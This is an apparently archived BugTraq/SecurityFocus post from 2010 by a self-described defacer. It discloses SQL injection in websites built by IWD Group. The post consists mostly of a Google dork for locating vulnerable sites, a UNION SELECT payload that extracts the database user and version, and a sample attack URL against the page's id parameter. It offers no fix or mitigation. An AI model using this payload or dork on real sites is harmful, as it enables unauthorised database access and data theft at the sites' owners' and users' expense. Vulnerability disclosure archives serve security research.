BugTraq
IWD Group SQL Injection Vulnerabilities Apr 22 2010 06:53PM
md r00t defacer gmail com
#------------------In The Name Of God------------

# IWD Group SQL Injection Vulnerabilities

###################################

#AUTHOR: md.r00t

#Mail: md.r00t.defacer (at) gmail (dot) com [email concealed]

#Webstie: www.r00t.gigfa.com

#

###################################

#Google D0rk:

# "Designed by IWD Group"

###################################

#Exploit:

#---------

#

# 195 and 1=2 Union select 1,2,concat(user(),char(58,58,58),version()),4

###################################

#Example:

#

http://www.Site.com/index.php?page=headline&id=195 and 1=2 Union select1,2,concat(user(),char(58,58,58),version()),4

###################################

#TNX:

#Aria-Security Team (Persian Security Network),Virangar Security Team

*****************************************

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus